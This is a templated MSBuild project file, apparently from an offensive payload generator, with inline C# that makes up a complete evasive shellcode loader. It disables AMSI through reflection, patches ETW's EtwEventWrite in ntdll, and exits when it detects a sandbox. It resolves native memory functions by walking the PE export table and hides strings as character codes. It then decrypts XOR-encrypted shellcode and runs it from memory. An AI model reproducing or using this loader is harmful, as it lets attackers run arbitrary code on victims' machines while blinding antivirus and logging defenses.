<Project ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
  <Target Name="{{ v.target_name }}">
    <{{ v.task_name }} />
  </Target>

  <UsingTask
    TaskName="{{ v.task_name }}"
    TaskFactory="CodeTaskFactory"
    AssemblyFile="$(MSBuildToolsPath)\Microsoft.Build.Tasks.v4.0.dll">
    <ParameterGroup />
    <Task>
      <Reference Include="System" />
      <Reference Include="System.Runtime.InteropServices" />
      <Using Namespace="System" />
      <Using Namespace="System.Runtime.InteropServices" />
      <Using Namespace="System.Reflection" />
      <Using Namespace="System.Threading" />
      <Code Type="Class" Language="cs">
      <![CDATA[
        using System;
        using System.IO;
        using System.Reflection;
        using System.Runtime.InteropServices;
        using System.Threading;
        using Microsoft.Build.Framework;
        using Microsoft.Build.Utilities;

        public class {{ v.task_name }} : Task, ITask {

            // Dynamic NtDll delegates — no DllImport strings in assembly metadata
            [UnmanagedFunctionPointer(CallingConvention.StdCall)]
            private delegate int NtAllocFn(IntPtr ph, ref IntPtr ba, IntPtr zb, ref IntPtr rs, uint at, uint prot);
            [UnmanagedFunctionPointer(CallingConvention.StdCall)]
            private delegate int NtProtFn(IntPtr ph, ref IntPtr ba, ref IntPtr sz, uint np, out uint op);

            static string B(int[] c) {
                var sb = new System.Text.StringBuilder();
                foreach (var x in c) sb.Append((char)x);
                return sb.ToString();
            }

            static byte[] N(int[] c) { var b=new byte[c.Length+1]; for(int i=0;i<c.Length;i++) b[i]=(byte)c[i]; return b; }

            // Walk PE export table by name bytes — no plaintext function name strings.
            static IntPtr {{ v.fn_getexport }}(IntPtr mod, byte[] name) {
                try {
                    int peo    = Marshal.ReadInt32(mod, 0x3C);
                    int exprva = Marshal.ReadInt32(IntPtr.Add(mod, peo + 0x88));
                    if (exprva == 0) return IntPtr.Zero;
                    IntPtr ed  = IntPtr.Add(mod, exprva);
                    int nn   = Marshal.ReadInt32(ed, 0x18);
                    int nrva = Marshal.ReadInt32(ed, 0x20);
                    int orva = Marshal.ReadInt32(ed, 0x24);
                    int frva = Marshal.ReadInt32(ed, 0x1C);
                    for (int i = 0; i < nn; i++) {
                        IntPtr np = IntPtr.Add(mod, Marshal.ReadInt32(IntPtr.Add(mod, nrva + i*4)));
                        bool ok = true;
                        for (int j = 0; j < name.Length; j++)
                            if (Marshal.ReadByte(IntPtr.Add(np, j)) != name[j]) { ok = false; break; }
                        if (!ok) continue;
                        short ord = Marshal.ReadInt16(IntPtr.Add(mod, orva + i*2));
                        return IntPtr.Add(mod, Marshal.ReadInt32(IntPtr.Add(mod, frva + ord*4)));
                    }
                } catch {}
                return IntPtr.Zero;
            }

            static void {{ v.fn_amsi }}() {
                try {
                    var t = Type.GetType(B(new int[]{ {{ v.jsc_auto_amsi_utils }} }));
                    if (t != null) {
                        var f = t.GetField(B(new int[]{ {{ v.jsc_amsi_init_fail }} }),
                            BindingFlags.NonPublic | BindingFlags.Static);
                        if (f != null) f.SetValue(null, true);
                    }
                } catch {}
            }

            static void {{ v.fn_etw }}(IntPtr ntdll) {
                try {
                    byte[] tgt = N(new int[]{ {{ v.jsc_etw_event_write }} });
                    IntPtr fn  = {{ v.fn_getexport }}(ntdll, tgt);
                    if (fn == IntPtr.Zero) return;
                    byte[] protN = N(new int[]{ {{ v.jsc_nt_prot_vm }} });
                    IntPtr protAddr = {{ v.fn_getexport }}(ntdll, protN);
                    if (protAddr == IntPtr.Zero) return;
                    var NtProt = (NtProtFn)Marshal.GetDelegateForFunctionPointer(protAddr, typeof(NtProtFn));
                    IntPtr ph = (IntPtr)(-1);
                    IntPtr ba = fn; IntPtr sz = (IntPtr)3; uint old;
                    NtProt(ph, ref ba, ref sz, 0x40, out old);
                    Marshal.WriteByte(fn, 0, 0x33);
                    Marshal.WriteByte(fn, 1, 0xC0);
                    Marshal.WriteByte(fn, 2, 0xC3);
                    IntPtr ba2 = fn; IntPtr sz2 = (IntPtr)3;
                    NtProt(ph, ref ba2, ref sz2, old, out old);
                } catch {}
            }

            static bool {{ v.fn_sandbox }}() {
                try {
                    string u = Environment.UserName.ToLower();
                    string[] badU = new string[]{B(new int[]{115,97,110,100,98,111,120}),B(new int[]{109,97,108,116,101,115,116}),B(new int[]{118,105,114,117,115}),B(new int[]{99,117,99,107,111,111}),B(new int[]{117,115,101,114}),B(new int[]{116,101,115,116})};
                    foreach (var b in badU) if (u == b) return true;
                    var di = new System.IO.DriveInfo("C");
                    if (di.TotalSize < 53687091200L) return true;
                    string cn = Environment.MachineName.ToLower();
                    if (cn.Contains(B(new int[]{115,97,110,100,98,111,120}))) return true;
                    if (cn.Contains(B(new int[]{97,110,97,108,121,115,105,115}))) return true;
                    if (Environment.GetEnvironmentVariable(B(new int[]{86,66,79,88,95,86,69,82,83,73,79,78})) != null) return true;
                    if (Environment.GetEnvironmentVariable(B(new int[]{83,65,78,68,66,79,88,73,69,95,72,79,77,69})) != null) return true;
                } catch {}
                return false;
            }

            static byte[] {{ v.fn_decrypt }}(byte[] data, byte[] key) {
                var o = new byte[data.Length];
                for (int i = 0; i < data.Length; i++) o[i] = (byte)(data[i] ^ key[i % key.Length]);
                return o;
            }

            static byte[] {{ v.fn_hex }}(string h) {
                var b = new byte[h.Length / 2];
                for (int i = 0; i < b.Length; i++)
                    b[i] = Convert.ToByte(h.Substring(i * 2, 2), 16);
                return b;
            }

            public override bool Execute() {
                if ({{ v.fn_sandbox }}()) return false;

                // Resolve ntdll from loaded modules (no GetModuleHandle string in IAT)
                IntPtr ntdll = IntPtr.Zero;
                foreach (System.Diagnostics.ProcessModule m in
                         System.Diagnostics.Process.GetCurrentProcess().Modules)
                    if (m.ModuleName.ToLower() == B(new int[]{ {{ v.jsc_ntdll_dll }} })) {
                        ntdll = m.BaseAddress; break;
                    }
                if (ntdll == IntPtr.Zero) return false;

                {{ v.fn_amsi }}();
                {{ v.fn_etw }}(ntdll);
                Thread.Sleep(2000 + new Random().Next(3000));

                byte[] _k = {{ v.fn_hex }}({% for chunk in key_chunks %}"{{ chunk }}"{% if not loop.last %}+{% endif %}{% endfor %});
                for (int _ki = 0; _ki < _k.Length; _ki++) _k[_ki] ^= (byte){{ key_tweak }};
                byte[] sc = {{ v.fn_decrypt }}({{ v.fn_hex }}({% for chunk in shellcode_chunks %}"{{ chunk }}"{% if not loop.last %}+{% endif %}{% endfor %}), _k);

                byte[] allocN = N(new int[]{ {{ v.jsc_nt_alloc_vm }} });
                byte[] protN  = N(new int[]{ {{ v.jsc_nt_prot_vm }} });
                IntPtr allocAddr = {{ v.fn_getexport }}(ntdll, allocN);
                IntPtr protAddr  = {{ v.fn_getexport }}(ntdll, protN);
                if (allocAddr == IntPtr.Zero || protAddr == IntPtr.Zero) return false;

                var NtAlloc = (NtAllocFn)Marshal.GetDelegateForFunctionPointer(allocAddr, typeof(NtAllocFn));
                var NtProt  = (NtProtFn )Marshal.GetDelegateForFunctionPointer(protAddr,  typeof(NtProtFn));

                IntPtr ph  = (IntPtr)(-1);
                IntPtr mem = IntPtr.Zero;
                IntPtr rsz = (IntPtr)sc.Length;
                if (NtAlloc(ph, ref mem, IntPtr.Zero, ref rsz, 0x3000, 0x04) != 0 || mem == IntPtr.Zero) return false;
                Marshal.Copy(sc, 0, mem, sc.Length);
                IntPtr psz = (IntPtr)sc.Length;
                uint oldProt;
                NtProt(ph, ref mem, ref psz, 0x20, out oldProt);

                var fn_thread = new Thread(() => {
                    var fn = (Action)Marshal.GetDelegateForFunctionPointer(mem, typeof(Action));
                    fn();
                });
                fn_thread.IsBackground = true;
                fn_thread.Start();
                fn_thread.Join();
                return true;
            }
        }
      ]]>
      </Code>
    </Task>
  </UsingTask>
</Project>
